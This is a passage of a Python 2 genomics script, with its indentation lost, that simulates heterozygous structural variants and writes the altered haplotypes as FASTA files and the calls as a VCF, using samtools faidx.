for k3 in sv_info[k1][k2]:
if not k3[0] in order_SV_Pos.keys():
order_SV_Pos[k3[0]]={}
if not int(k3[1]) in order_SV_Pos[k3[0]].keys():
order_SV_Pos[k3[0]][int(k3[1])]=[]
order_SV_Pos[k3[0]][int(k3[1])].append([[k3[0]]+[int(i) for i in k3[1:-1]],[k2.split('/')[0]]])
def order_SV_Het_write(sv_info):
for k1 in sv_info.keys():
for k2 in sv_info[k1].keys():
for k3 in sv_info[k1][k2]:
if not k3[0] in order_SV_Pos.keys():
order_SV_Pos[k3[0]]={}
if not int(k3[1]) in order_SV_Pos[k3[0]].keys():
order_SV_Pos[k3[0]][int(k3[1])]=[]
order_SV_Pos[k3[0]][int(k3[1])].append([[k3[0]]+[int(i) for i in k3[1:-1]],[k2.split('/')[0],k2.split('/')[1],k1.split('/')[0]]])
def Ref_Alt_Produce(ChromoList,bp_list,letter_new,Ref_Seq_File):
#Chromo=Chr, target chromosome
#BamN: DG187, DG196... name of sample
#eg of bp_list:[184569179, 184569775, 184571064, 184572009, 184572016]
#Eg of flank: flank : 446
if letter_new=='':
return insert_read_decide(bp_list)
else:
bp_hash={}
bp_seq=[]
for k1 in bp_list:
if k1 in ChromoList:
bp_seq.append([k1])
else:
bp_seq[-1].append(k1)
rec=0
for k1 in bp_seq:
for k2 in range(len(k1)-2):
rec+=1
bp_hash[chr(96+rec)]=[k1[0],k1[k2+1],k1[k2+2]]
letter_seq={}
for k1 in bp_hash.keys():
Chromo=bp_hash[k1][0]
region_left=bp_hash[k1][1]
region_right=bp_hash[k1][2]
seq=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File,Chromo,region_left,region_right))
seq.readline().strip().split()
lines=[]
while True:
line=seq.readline().strip().split()
if not line: break
lines.append(line)
Seq1=lines[0][0]
for j in range(len(lines))[1:]:
Seq1=''.join([Seq1,lines[j][0]])
letter_seq[k1]=Seq1
letter_seq[k1+'^']=reverse(complementary(Seq1))
new_Seq=''
new_letter=[]
for k1 in letter_new:
if not k1=='^':
new_letter.append(k1)
else:
new_letter[-1]+=k1
for k1 in new_letter:
new_Seq+=letter_seq[k1]
new_Seq+=insert_read_decide(bp_list)
return new_Seq
def Ref_Ref_Produce(Chromo,bp_list,Ref_Seq_File):
start=int(bp_list[0])
end=int(bp_list[-1])
new1_ref=''
fin=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File, Chromo, start,end))
fin.readline().strip().split()
for line in fin:
pin=line.strip().split()
new1_ref+=pin[0]
fin.close()
return new1_ref
def reverse(seq):
seq2=[]
for i in seq[::-1]:
seq2.append(i)
return ''.join(seq2)
def complementary(seq):
seq2=[]
for i in seq:
if i in 'ATGCN':
seq2.append('ATGCN'['TACGN'.index(i)])
elif i in 'atgcn':
seq2.append('atgcn'['tacgn'.index(i)])
return ''.join(seq2)
def unit_produce(list):
temp1=[sorted(list)[0]]
for k1 in sorted(list)[1:]:
if ord(k1)-ord(temp1[-1][-1])==1:
temp1[-1]+=k1
else:
temp1.append(k1)
temp2=[]
for k1 in temp1:
for k2 in range(len(k1)+1)[1:]:
for k3 in range(len(k1)-k2+1):
temp2.append(k1[k3:(k3+k2)])
return temp2[::-1]
def fasta_homo_write(fasta_out):
fo=open(fasta_out,'w')
print fasta_out
for k1 in chromos:
print >>fo, '>'+k1
new1_ref=''
rec1_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
rec1_start=end
rec1_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for k1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[k1*60:(k1+1)*60])
new1_seq.append(new1_ref[(k1+1)*60:])
for k1 in new1_seq:
if not k1=='':
print >>fo, k1
fo.close()
def fasta_het_write_a(fasta_out):
fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
#fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
fo1.close()
#fo2.close()
print fasta_out.replace('.het.fa','.het1.fa')
#print fasta_out.replace('.het.fa','.het2.fa')
for k1 in chromos:
fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
#fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
print >>fo1, '>'+k1
#print >>fo2, '>'+k1
new1_ref=''
rec1_start=0
#new2_ref=''
#rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
if not k3[0][1][0]==k3[0][1][2]:
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
else:
new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
rec1_start=end
#rec2_start+=1
#new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
#if not k3[0][1][1]==k3[0][1][2]:
# new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
#else:
# new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
#rec2_start=end
rec1_start+=1
#rec2_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for ka1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
new1_seq.append(new1_ref[(ka1+1)*60:])
for ka1 in new1_seq:
if not ka1=='':
print >>fo1, ka1
#new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
#new2_seq=[]
#for ka1 in range(len(new2_ref)/60):
# new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
#new2_seq.append(new2_ref[(ka1+1)*60:])
#for ka1 in new2_seq:
# if not ka1=='':
# print >>fo2, ka1
fo1.close()
#fo2.close()
def fasta_het_write_b(fasta_out):
#fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
#fo1.close()
fo2.close()
#print fasta_out.replace('.het.fa','.het1.fa')
print fasta_out.replace('.het.fa','.het2.fa')
for k1 in chromos:
#fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
#print >>fo1, '>'+k1
print >>fo2, '>'+k1
#new1_ref=''
#rec1_start=0
new2_ref=''
rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
#rec1_start+=1
#new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
#if not k3[0][1][0]==k3[0][1][2]:
# new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
#else:
# new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
#rec1_start=end
rec2_start+=1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
if not k3[0][1][1]==k3[0][1][2]:
new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
else:
new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
rec2_start=end
#rec1_start+=1
rec2_start+=1
#new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
#new1_seq=[]
#for ka1 in range(len(new1_ref)/60):
# new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
#new1_seq.append(new1_ref[(ka1+1)*60:])
#for ka1 in new1_seq:
# if not ka1=='':
# print >>fo1, ka1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
new2_seq=[]
for ka1 in range(len(new2_ref)/60):
new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
new2_seq.append(new2_ref[(ka1+1)*60:])
for ka1 in new2_seq:
if not ka1=='':
print >>fo2, ka1
#fo1.close()
fo2.close()
def Sample_info_ReadIn(Sam_File):
fi=open(Sam_File)
for line in fi:
pin=line.strip().split()
if not pin==[]:
if not pin[0] in sv_hash.keys():
sv_hash[pin[0]]=[]
sv_hash[pin[0]].append([int(i) for i in pin[1:]])
sv_hash[pin[0]][-1][0]=int(sv_hash[pin[0]][-1][0]*1.25)
else:
sv_hash[pin[0]].append([int(i) for i in pin[1:]])
sv_hash[pin[0]][-1][0]=int(sv_hash[pin[0]][-1][0]*1.25)
fi.close()
def sv_total_num_calcu():
sv_total_num=0
for k1 in del_stat:
sv_total_num+=k1[0]
for k1 in dup_stat:
sv_total_num+=k1[0]
for k1 in inv_stat:
sv_total_num+=k1[0]
for k1 in tra_stat:
sv_total_num+=k1[0]
for k1 in dup2_stat:
sv_total_num+=k1[0]
return sv_total_num
def pick_random_seqs(ref,sv_total_num,chromo_length):
#12% of all SVs have micro insrts at both /either ends
#double number of seqs would be randomly picked from genome as long micro-insertions
num_micro_ins_over20bp=float(sv_total_num)*0.12*2
genome_length=0
chromos_num_regions={}
chrom_seqs={}
for x in chromo_length.keys():
if not 'GL' in x and not x in ['X','Y','MT']:
genome_length+=chromo_length[x]
for x in chromo_length.keys():
if not 'GL' in x and not x in ['X','Y','MT']:
chromos_num_regions[x]=float(chromo_length[x])/float(genome_length)*num_micro_ins_over20bp
for x in chromos_num_regions.keys():
chrom_seqs[x]=[]
int_num=int(round(chromos_num_regions[x]))
seq_pick=random.sample(range(10000,chromo_length[x]-10000),int_num)
for y in sorted(seq_pick):
length_pick=random.sample(range(20,50),1)[0]
seqs=os.popen(r'''samtools faidx %s %s:%d-%d'''%(ref,x,y,y+length_pick))
seqs.readline()
test=seqs.readline().strip()
if not 'NNNNNNNN' in test:
chrom_seqs[x].append(test)
seqs.close()
return chrom_seqs
def produce_random_seqs(length):
out=[]
for x in range(length):
out.append(random.choice(['A','T','G','C']))
return ''.join(out)
opts,args=getopt.getopt(sys.argv[2:],'',['reference=','input-sim=','input-rec=','output-prefix='])
dict_opts=dict(opts)
Sam_File=dict_opts['--input-sim']
sv_hash={}
Sample_info_ReadIn(Sam_File)
del_stat=sv_stat_calcu(sv_hash,'DEL')
dup_stat=sv_stat_calcu(sv_hash,'DUP_TANDEM')
dup2_stat=sv_stat_calcu(sv_hash,'DUP')
dup3_stat=[]
for i in dup2_stat:
dup3_stat.append([i[0]]+[j+1000 for j in i[1:]])
dup2_stat=dup3_stat
inv_stat=sv_stat_calcu(sv_hash,'INV')
tra_stat=sv_stat_calcu(sv_hash,'TRA')
sv_total_num=sv_total_num_calcu()
del_size=sv_size_pick(del_stat)
dup_size=sv_size_pick(dup_stat)
dup2_size=sv_size_pick(dup2_stat)
inv_size=sv_size_pick(inv_stat)
tra_size=sv_size_pick(tra_stat)
refs=dict_opts['--reference']
ref=refs
if not os.path.isfile(refs):
print 'Wrong reference genome !'
if not os.path.isfile(refs+'.fai'):
print 'reference genome not indexed !'
chromos_TOTAL=chromos_readin(refs)
genome_length=chromos_TOTAL[0]
chromos=chromos_TOTAL[1]
chromo_num_region=chromos_TOTAL[2]
chromo_length=chromos_TOTAL[3]
sv_hash={}
sv_hash_add(del_size,'DEL')
sv_hash_add(dup_size,'DUP_TANDEM')
sv_hash_add(dup2_size,'DUP')
sv_hash_add(inv_size,'INV')
sv_hash_add(tra_size,'TRA')
SV_region=sv_region_pick()
SV_region_filter=[]
for x in SV_region:
if x[-1]=='DUP' and x[2]-x[1]<1100: continue
else:
SV_region_filter.append(x)
SV_region=SV_region_filter
sv_homo_info={}
sv_homo_initial()
sv_homo_produce()
sv_het_info={}
sv_het_produce()
for y in range(len(sv_het_info['DUP'])):
x=sv_het_info['DUP'][y]
if x[2]-x[1]<2000:
z=random.choice([x[1]+1000,x[2]-1000])
else:
z=random.choice(range(x[1]+800,x[1]+1200)+range(x[2]-1200,x[2]-800))
sv_het_info['DUP'][y]=x[:2]+[z]+x[2:]
sv_rec_het_produce()
sv_info={}
sv_info_rewrite(sv_het_info)
dup1={}
inv1={}
del1={}
tra1={}
sv_rec_2(sv_info)
sv_out={}
hash_reorder()
vcf_out=dict_opts['--output-prefix']+'.vcf'
write_VCF_header(vcf_out)
write_VCF_main(vcf_out)
fasta_out=dict_opts['--output-prefix']+'.het.fa'
#produce fasta file containing all sv file for homo svs
order_SV_Pos={}
order_SV_Het_write(sv_info)
seq_ins_pools=pick_random_seqs(ref,sv_total_num,chromo_length)
fasta_het_write_a(fasta_out)
fasta_het_write_b(fasta_out)
os.system(r'''samtools faidx %s'''%(fasta_out.replace('.het.fa','.het1.fa')))
os.system(r'''samtools faidx %s'''%(fasta_out.replace('.het.fa','.het2.fa')))
elif function_name=='homozygous':
def sv_rec_2(sv_info):
for k1ab in sorted(sv_info.keys()):
for k2ab in sv_info[k1ab].keys():
if not k2ab==k1ab:
k1aba=k1ab.split('/')[0]
k2aba=k2ab.split('/')[0]
k2abb=k2ab.split('/')[1]
flaga=[]
flagb=[]
test=[[],[]]
if flaga==[] and not k1aba==k2aba:
if k2aba=='':
csv1=[[i for i in k1aba],[],[],0]
else:
csv1=simple_flag_SA(k1aba,k2aba)
add_csv_info(csv1,1,k1ab,k2ab)
if flagb==[] and not k1aba==k2abb:
if k2abb=='':
csv1=[[i for i in k2abb],[],[],0]
else:
csv1=simple_flag_SA(k1aba,k2abb)
add_csv_info(csv1,2,k1ab,k2ab)
score_Cff=-20
def hash_reorder():
for ka1 in del1.keys():
if not ka1 in sv_out.keys():
sv_out[ka1]={}
for ka2 in del1[ka1]:
#fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
#tre=fref.readline().strip().split()
#REF_AL=fref.readline().strip().split()[0]
REF_AL='N'
Pass_Sign='PASS'
if ka2[3]<score_Cff:
Pass_Sign='LowQual'
if ka2[2]=='heta':
GenoType='1|0'
elif ka2[2]=='hetb':
GenoType='0|1'
elif ka2[2]=='homo':
GenoType='1|1'
ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<DEL>',ka2[3],Pass_Sign,'SVTYPE=DEL;END='+str(ka2[1]),'GT',GenoType]
if not ka2[-1] in sv_out[ka1].keys():
sv_out[ka1][ka2[-1]]=[]
if not ka_new in sv_out[ka1][ka2[-1]]:
sv_out[ka1][ka2[-1]].append(ka_new)
for ka1 in inv1.keys():
if not ka1 in sv_out.keys():
sv_out[ka1]={}
for ka2 in inv1[ka1]:
#fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
#tre=fref.readline().strip().split()
#REF_AL=fref.readline().strip().split()[0]
REF_AL='N'
Pass_Sign='PASS'
if ka2[3]<score_Cff:
Pass_Sign='LowQual'
if ka2[2]=='heta':
GenoType='1|0'
elif ka2[2]=='hetb':
GenoType='0|1'
elif ka2[2]=='homo':
GenoType='1|1'
ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<INV>',ka2[3],Pass_Sign,'SVTYPE=INV;END='+str(ka2[1]),'GT',GenoType]
if not ka2[-1] in sv_out[ka1].keys():
sv_out[ka1][ka2[-1]]=[]
if not ka_new in sv_out[ka1][ka2[-1]]:
sv_out[ka1][ka2[-1]].append(ka_new)
for ka1 in dup1.keys():
if not ka1 in sv_out.keys():
sv_out[ka1]={}
for ka2 in dup1[ka1]:
#fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,ka1,str(ka2[0]+1),str(ka2[0]+1)))
#tre=fref.readline().strip().split()
#REF_AL=fref.readline().strip().split()[0]
REF_AL='N'
CopyNumber=str(ka2[-1])
Pass_Sign='PASS'
if ka2[3]<score_Cff:
Pass_Sign='LowQual'
if ka2[2]=='heta':
GenoType='1|0'
elif ka2[2]=='hetb':
GenoType='0|1'
elif ka2[2]=='homo':
GenoType='1|1'
ka_new=[ka1,ka2[0],ka2[-2],REF_AL,'<DUP>',ka2[3],Pass_Sign,'SVTYPE=DUP;END='+str(ka2[1]),'GT:CN',GenoType+':'+CopyNumber]
if not ka2[-2] in sv_out[ka1].keys():
sv_out[ka1][ka2[-2]]=[]
if not ka_new in sv_out[ka1][ka2[-2]]:
sv_out[ka1][ka2[-2]].append(ka_new)
for ka1 in tra1.keys():
ks1=ka1.split('_')[0]
ks2='_'.join(ka1.split('_')[:-1])
SV_Score=float(ka1.split('_')[-1])
Pass_Sign='PASS'
if SV_Score<score_Cff:
Pass_Sign='LowQual'
if not ks1 in sv_out.keys():
sv_out[ks1]={}
if not ks2 in sv_out[ks1].keys():
sv_out[ks1][ks2]=[]
for ka2 in tra1[ka1].keys():
hetx='het'+ka2
if ka2=='a':
GenoType='1|0'
elif ka2=='b':
Genotype='0|1'
for ka3 in tra1[ka1][ka2]:
ka_new=ka3[:2]+[ks2,ka3[2]]+ka3[3:]+[SV_Score,Pass_Sign,'SVTYPE=TRA','GT',GenoType]
if not ka_new in sv_out[ks1][ks2]:
sv_out[ks1][ks2].append(ka_new)
def write_VCF_header(output_file):
fo=open(output_file,'w')
print output_file
print>>fo, '##fileformat=VCFv4.1'
print>>fo,'##fileDate='+time.strftime("%Y%m%d")
print>>fo,'##reference=hg19'
print>>fo,'##INFO=<ID=BKPTID,Number=.,Type=String,Description="ID of the assembled alternate allele in the assembly file">'
print>>fo,'##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">'
print>>fo,'##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">'
print>>fo,'##INFO=<ID=END,Number=1,Type=Integer,Description="End position of the variant described in this record">'
print>>fo,'##INFO=<ID=HOMLEN,Number=.,Type=Integer,Description="Length of base pair identical micro-homology at event breakpoints">'
print>>fo,'##INFO=<ID=HOMSEQ,Number=.,Type=String,Description="Sequence of base pair identical micro-homology at event breakpoints">'
print>>fo,'##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">'
print>>fo,'##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END,POLARITY">'
print>>fo,'##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="Difference in length between REF and ALT alleles">'
print>>fo,'##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">'
print>>fo,'##FILTER=<ID=LowQual,Description="Score of final structural - Theoretical Score <-50">'
print>>fo,'##ALT=<ID=DEL,Description="Deletion">'
print>>fo,'##ALT=<ID=DEL:ME:ALU,Description="Deletion of ALU element">'
print>>fo,'##ALT=<ID=DEL:ME:L1,Description="Deletion of L1 element">'
print>>fo,'##ALT=<ID=DUP,Description="Duplication">'
print>>fo,'##ALT=<ID=DUP_TANDEM,Description="Tandem Duplication">'
print>>fo,'##ALT=<ID=INS,Description="Insertion of novel sequence">'
print>>fo,'##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">'
print>>fo,'##ALT=<ID=INS:ME:L1,Description="Insertion of L1 element">'
print>>fo,'##ALT=<ID=INV,Description="Inversion">'
print>>fo,'##ALT=<ID=CNV,Description="Copy number variable region">'
print>>fo,'##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">'
print>>fo,'##FORMAT=<ID=GQ,Number=1,Type=Float,Description="Genotype quality">'
print>>fo,'##FORMAT=<ID=CN,Number=1,Type=Integer,Description="Copy number genotype for imprecise events">'
print>>fo,'##FORMAT=<ID=CNQ,Number=1,Type=Float,Description="Copy number genotype quality for imprecise events">'
print>>fo,'\t'.join(['#CHROM','POS','ID','REF','ALT','QUAL','FILTER','INFO','FORMAT',output_file.split('/')[-1].replace('.vcf','')])
fo.close()
def write_VCF_main(output_file):
fo=open(output_file,'a')
print output_file
sv_reorganize={}
for k1 in sv_out.keys():
sv_reorganize[k1]={}
for k2 in sv_out[k1].keys():
start=int(k2.split('_')[1])
if not start in sv_reorganize[k1].keys():
sv_reorganize[k1][start]={}
SVtemp_a=[]
SVtemp_b=[]
for k3 in sv_out[k1][k2]:
if not k3[:-1] in SVtemp_a:
SVtemp_a.append(k3[:-1])
SVtemp_b.append([k3[-1]])
else:
SVtemp_b[SVtemp_a.index(k3[:-1])].append(k3[-1])
SVtemp=[]
sv_reorganize[k1][start][k2]=[]
for k3 in range(len(SVtemp_a)):
if len(SVtemp_b[k3])==2 and SVtemp_b[k3] in [['0|1', '1|0'],['1|0', '0|1']]:
SVtemp_b[k3]=['1|1']
for k3 in range(len(SVtemp_a)):
for k4 in SVtemp_b[k3]:
sv_reorganize[k1][start][k2].append(SVtemp_a[k3]+[k4])
for k1 in chromos:
if k1 in sv_reorganize.keys():
for k2 in sorted(sv_reorganize[k1].keys()):
for k3 in sorted(sv_reorganize[k1][k2].keys()):
for k4 in sv_reorganize[k1][k2][k3]:
if k4[3]=='N':
k4[3]=ref_base_returnN(ref,k4[0],k4[1])
print >>fo, '\t'.join([str(i) for i in k4])
fo.close()
def simple_flag_SA(k1,k2):
temp=[]
break_flag=0
for i in k2:
if not i=='^':
temp.append(i)
else:
temp[-1]+=i
temp2=[temp[0]]
for i in range(len(temp[1:])):
if not '^' in temp[i] and not '^' in temp[i+1] and ord(temp[i+1])-ord(temp[i])==1:
temp2[-1]+=temp[i+1]
elif '^' in temp[i] and '^' in temp[i+1] and ord(temp[i+1][0])-ord(temp[i][0])==-1:
temp2[-1]=temp[i+1][0]+temp2[-1]
else:
temp2.append(temp[i+1])
outdel=[]
outinv=[]
outdup=[]
outtra=0
for i in range(len(temp2)):
j=temp2[i]
if '^' in j:
if not j.replace('^','') in outinv:
outinv.append(j.replace('^',''))
temp2[i]=j.replace('^','')
temp3=''.join(temp2)
for i in range(len(temp3)-1):
if ord(temp3[i+1])-ord(temp3[i])<0:
outtra=1
if not temp3==k1:
temp4=[]
for i in temp3:
if temp3.count(i)>1:
if not i in outdup:
outdup.append(i)
if not i in temp4:
temp4.append(i)
if not ''.join(temp4)==k1:
for i in k1:
if not i in temp4:
outdel.append(i)
if not outdup==[]:
dupuni=unit_produce(outdup)
outdup2=[]
k3=k2
for i in dupuni:
ia=i
ib=''.join([j+'^' for j in i[::-1]])
if len(i)>1:
if temp2.count(ia)+temp2.count(ib)>1:
outdup2.append([i,temp2.count(ia)+temp2.count(ib)])
k3=k3.replace(ia,'')
k3=k3.replace(ib,'')
elif len(i)==1:
if k3.count(ia)+k3.count(ib)>1:
outdup2.append([i,k3.count(ia)])
k3=k3.replace(ia,'')
k3=k3.replace(ib,'')
else:
outdup2=[]
return [outdel,outinv,outdup2,outtra]
def add_csv_info(csv1,flag_sex,k1,k2):
#flag_sex=1: Maternal
#flag_sex=2: Paternal
if flag_sex==1:
del_let=[csv1[0],[]]
inv_let=[csv1[1],[]]
dup_let=[csv1[2],[]]
else:
del_let=[[],csv1[0]]
inv_let=[[],csv1[1]]
dup_let=[[],csv1[2]]
for k3 in sv_info[k1][k2]:
del_info_add(k3,del_let)
inv_info_add(k3,inv_let)
dup_info_2_add(k3,dup_let)
if csv1[3]==1:
tra_info_add(k1,k2)
def del_info_add(k3,del_let):
tempa=bp_to_hash(k3[:-1],del_let[0])
tempb=bp_to_hash(k3[:-1],del_let[1])
for k1 in tempa:
if k1 in tempb:
tempc='hom'
tempb.remove(k1)
else:
tempc='heta'
if not k1[0] in del1.keys():
del1[k1[0]]=[]
del1[k1[0]].append(k1[1:]+[tempc,k3[-1],'_'.join(k3[:-1])])
for k1 in tempb:
if not k1[0] in del1.keys():
del1[k1[0]]=[]
del1[k1[0]].append(k1[1:]+['hetb',k3[-1],'_'.join(k3[:-1])])
def dup_info_add(k3,dup_let):
#dup_let=[k2i,k2j]
for k2x in dup_let:
for k4 in k2x:
temp=bp_to_hash(k3[:-1],[i for i in k4])
for k5 in temp:
if not k5[0] in dup1.keys():
dup1[k5[0]]=[]
dup1[k5[0]].append(k5[1:]+[k3[-1],'_'.join(k3[:-1]),k2a.count(k4)])
def dup_info_2_add(k3,dup_let):
temprec=-1
for k2x in dup_let:
temprec+=1
hetx=['heta','hetb'][temprec]
for k4 in k2x:
temp=bp_to_hash(k3[:-1],[i for i in k4[0]])
for k5 in temp:
if not k5[0] in dup1.keys():
dup1[k5[0]]=[]
if k4[1]>1:
dup1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1]),k4[1]])
def inv_info_add(k3,inv_let):
#inv_let=[k2m,k2n]
temprec=-1
for k2x in inv_let:
temprec+=1
hetx=['heta','hetb'][temprec]
for k4 in k2x:
temp=bp_to_hash(k3[:-1],[i for i in k4])
for k5 in temp:
if not k5[0] in inv1.keys():
inv1[k5[0]]=[]
inv1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1])])
def let_reclust(vec_in):
if vec_in==[]:
return []
else:
k2e=[]
k2e=[vec_in[0]]
for k3 in range(len(vec_in)-1):
if '^' in vec_in[k3+1]:
if '^' in vec_in[k3] and ord(vec_in[k3][0])-ord(vec_in[k3+1][0])==1:
k2e[-1]+=vec_in[k3+1]
else:
k2e.append(vec_in[k3+1])
else:
if ord(vec_in[k3+1][0])-ord(vec_in[k3][0])==1 and not '^' in vec_in[k3]:
k2e[-1]+=vec_in[k3+1]
else:
k2e.append(vec_in[k3+1])
k2f=[]
for k3 in k2e:
if '^' in k3:
k5=''
for k4 in range(len(k3)/2):
k5+=k3[2*k4]
k6=k5[::-1]+'^'
if not k6 in k2f:
k2f.append(k6)
else:
k2f.append(k3)
return k2f
def dup_let_recombind(vec_in):
if vec_in==[]:
return []
else:
vec2=sorted(vec_in)
vec=[[vec2[0]]]
for ka in vec2[1:]:
if ord(ka)-ord(vec[-1][-1])==1:
vec[-1].append(ka)
else:
vec.append([ka])
vec3=[]
for ka in vec:
if len(ka)==1:
vec3.append(ka)
else:
for kb in range(2,len(ka)+1):
for kc in ka[:(1-kb)]:
vec3.append([])
for kd in range(kb):
vec3[-1].append(ka[ka.index(kc)+kd])
vec4=[''.join(i) for i in vec3]
return vec4
def comp_info_reorganize(k1,k2):
del_let=[[],[]]
dup_let=[[],[]]
inv_let=[[],[]]
tra_let=[[],[]]
k2a=k2.split('/')[0]
k2b=k2.split('/')[1]
k2c=[]
k2d=[]
for k3 in k2a:
if not k3=='^':
k2c.append(k3)
else:
k2c[-1]+=k3
for k3 in k2b:
if not k3=='^':
k2d.append(k3)
else:
k2d[-1]+=k3
for k3 in k1.split('/')[0]:
if k2a.count(k3)==0:
del_let[0].append(k3)
if k2b.count(k3)==0:
del_let[1].append(k3)
if k2a.count(k3)>1:
dup_let[0].append(k3)
if k2b.count(k3)>1:
dup_let[1].append(k3)
k2e=let_reclust(k2c)
k2f=let_reclust(k2d)
k2g=dup_let_recombind(dup_let[0])
k2h=dup_let_recombind(dup_let[1])
k2i=[]
#integreated dup sections
k2j=[]
#integreated dup sections
for k3 in k2g:
flag1=0
for k4 in k2e:
if k3 in k4:
flag1+=1
if flag1>1:
k2i.append(k3)
for k3 in dup_let[0]:
if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
if not k3[0] in k2i:
k2i.append(k3[0])
for k3 in k2h:
flag1=0
for k4 in k2e:
if k3 in k4:
flag1+=1
if flag1>1:
k2j.append(k3)
for k3 in dup_let[1]:
if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
if not k3[0] in k2j:
k2j.append(k3[0])
k2m=[]
for k3 in k2e:
if k3[-1]=='^':
k2m.append(k3)
k2n=[]
for k3 in k2f:
if k3[-1]=='^':
k2n.append(k3)
for k3 in sv_info[k1][k2]:
del_info_add(k3,del_let)
dup_info_add(k3,[k2i,k2j])
inv_info_add(k3,[k2m,k2n])
def bp_to_hash(bp_list,sv_let):
bp_hash={}
block_rec=0
block_hash=[]
sv_let=[i[0] for i in sv_let]
for a3 in bp_list:
if a3 in chromos or not a3.isdigit():
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
out=[]
if not sv_let==[]:
if len(sv_let)==1:
out=[bp_hash[sv_let[0]]]
else:
out.append(bp_hash[sv_let[0]])
for ka in range(len(sv_let)-1):
if ord(sv_let[ka+1])-ord(sv_let[ka])==1 and bp_hash[sv_let[ka+1]][0]==bp_hash[sv_let[ka]][0]:
out[-1]+=bp_hash[sv_let[ka+1]][1:]
else:
out.append(bp_hash[sv_let[ka+1]])
out2=[]
for ka in out:
out2.append([ka[0],int(ka[1]),int(ka[-1])])
return out2
def tra_info_add(k1,k2):
for k3 in sv_info[k1][k2]:
SV_ID='_'.join([str(i) for i in k3])
tra1[SV_ID]={}
k2a=k2.split('/')[0]
k2b=k2.split('/')[1]
bp_hash={}
block_rec=0
block_hash=[]
for a3 in k3[:-1]:
if a3 in chromos or not a3.isdigit():
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
for a3 in bp_hash.keys():
temp=[]
for a4 in bp_hash[a3][1:]:
temp.append(int(a4)-1)
temp.append(int(a4))
bp_hash[a3][1:]=temp
#ref_allele['left']=[ref_allele[k1[0]][0]]
#ref_allele['right']=[ref_allele[k1[-1]][1]]
bp_hash['left']=[bp_hash[k1[0]][0],bp_hash[k1[0]][1],bp_hash[k1[0]][2]]
bp_hash['right']=[bp_hash[k1[-1]][0],bp_hash[k1[-1]][3],bp_hash[k1[-1]][4]]
ref_allele={}
for a3 in bp_hash.keys():
